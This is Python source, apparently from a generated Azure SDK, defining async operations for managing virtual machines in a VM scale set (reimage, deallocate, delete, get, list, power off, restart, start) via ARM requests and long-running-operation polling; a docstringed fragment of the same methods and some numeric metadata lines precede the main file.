error_map.update(kwargs.pop('error_map', {}))
request = build_restart_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._restart_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_restart_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'} # type: ignore
@distributed_trace_async
async def begin_restart(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Restarts a virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._restart_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'} # type: ignore
async def _start_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_start_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._start_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'} # type: ignore
@distributed_trace_async
async def begin_start(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Starts a virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._start_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'} # type: ignore
| 47.445186
| 361
| 0.678802
|
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._virtual_machine_scale_set_vms_operations import build_deallocate_request_initial, build_delete_request_initial, build_get_instance_view_request, build_get_request, build_list_request, build_power_off_request_initial, build_reimage_all_request_initial, build_reimage_request_initial, build_restart_request_initial, build_start_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualMachineScaleSetVMsOperations:
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _reimage_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_reimage_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._reimage_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reimage_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'}
@distributed_trace_async
async def begin_reimage(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._reimage_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'}
async def _reimage_all_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_reimage_all_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._reimage_all_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reimage_all_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'}
@distributed_trace_async
async def begin_reimage_all(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._reimage_all_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage_all.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'}
async def _deallocate_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_deallocate_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._deallocate_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_deallocate_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'}
@distributed_trace_async
async def begin_deallocate(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._deallocate_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_deallocate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'}
async def _delete_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'}
@distributed_trace_async
async def begin_delete(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'}
@distributed_trace_async
async def get(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetVM":
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetVM', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'}
@distributed_trace_async
async def get_instance_view(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetVMInstanceView":
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_instance_view_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self.get_instance_view.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetVMInstanceView', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_instance_view.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/instanceView'}
@distributed_trace
def list(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
filter: Optional[str] = None,
select: Optional[str] = None,
expand: Optional[str] = None,
**kwargs: Any
) -> AsyncIterable["_models.VirtualMachineScaleSetVMListResult"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
virtual_machine_scale_set_name=virtual_machine_scale_set_name,
subscription_id=self._config.subscription_id,
filter=filter,
select=select,
expand=expand,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
resource_group_name=resource_group_name,
virtual_machine_scale_set_name=virtual_machine_scale_set_name,
subscription_id=self._config.subscription_id,
filter=filter,
select=select,
expand=expand,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("VirtualMachineScaleSetVMListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines'}
async def _power_off_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_power_off_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._power_off_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_power_off_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'}
@distributed_trace_async
async def begin_power_off(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._power_off_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_power_off.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'}
async def _restart_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_restart_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._restart_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_restart_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'}
@distributed_trace_async
async def begin_restart(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._restart_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'}
async def _start_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_start_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._start_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'}
@distributed_trace_async
async def begin_start(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._start_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
